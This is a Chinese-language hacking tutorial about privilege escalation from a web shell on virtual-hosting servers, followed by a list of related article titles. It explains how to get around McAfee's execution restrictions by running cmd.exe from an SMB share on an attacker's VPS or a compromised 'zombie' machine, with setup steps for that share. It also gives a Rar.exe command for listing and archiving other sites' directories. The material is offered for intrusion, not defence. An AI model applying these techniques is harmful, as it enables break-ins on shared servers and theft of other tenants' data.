虚拟主机提权,调用远程路径去执行CMD
来源:互联网 发布:php csdn 编辑:程序博客网 时间:2024/06/09 14:09
大家是否遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 “拒绝访问”?
原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。
大家看下面这个小技巧:
1: 大家是否会想到调用远程路径去执行CMD,比如(\\x.x.x.x\test\cmd.exe),经过测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!调用远程路径的时候要注意一下几点:
1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活GUEST用户,在组策略中将 网络访问: 本地帐户的共享和安全模型 改为经典,所在共享目录程序给Everyone权限。
2:还要注意一点就是你要提权的机器能去访问你自己VPS的445端口,想知道能不能访问可以在SHELL上扫一下(如果不能,他肯定能去访问C段中机器的共享,明白啥意思了?)
2:这里提到的第二个小技巧就是利用WINRAR,应该有些人已经会用他去列目录了,(这个方法就是你实在提不了,补丁很全,要么就是杀软很牛,而免杀不是你的强项,如果你想跨目录弄到目标站),首先在目标站找个图片地址,
然后shell里面C:\progra~1\WinRAR\Rar.exe a -k -r -s -m1 c:\windows\temp\xx.rar E:\freehost\xxoo.jpg,这样shell中会回显你打包成功,目标网站根路径会显示出来,然后你打包网站根路径,会将网站所有目录列出来,你们可能会问,都是虚拟权限你怎么过去,可是我测试了星外,新网的虚拟主机,都成功列出目录并打包。
- 虚拟主机提权技巧:调用远程路径去执行CMD
- 虚拟主机提权,调用远程路径去执行CMD
- java本地调用cmd,shell命令,远程调用Linux执行命令方法总结
- java本地调用cmd,shell命令,远程调用Linux执行命令方法总结
- JAVA 调用cmd执行命令
- 调用cmd,执行dos命令
- C# 调用执行CMD命令
- c# 调用CMD命令行,执行
- ArcEngine调用cmd执行python
- c#调用CMD执行程序
- 远程执行CMD命令部分代码
- 远程执行CMD命令部分代码
- 远程执行CMD命令部分代码
- 远程执行cmd命令并得到结果
- 利用匿名管道实现远程调用CMD
- C#如何调用cmd程序的执行
- c#中调用cmd命令执行批处理文件
- c#中调用cmd命令执行批处理文件
- 使用stl的next_permutation
- Uva375
- 仿制金山毒霸专杀工具界面
- jQuery Capty 图片标题插件
- java performance 读书笔记—— (二)os 性能监测
- 虚拟主机提权,调用远程路径去执行CMD
- UVA568
- Java在Linux下 不能处理图形的解决办法
- 电磁场复习之场论总结
- dispatch_once方式创建的单例
- eWebEditor v3.8 ASP版列目录漏洞
- windows qt 编译 oracle11g驱动
- PowerShell基础
- 28个Unix/Linux的命令行神器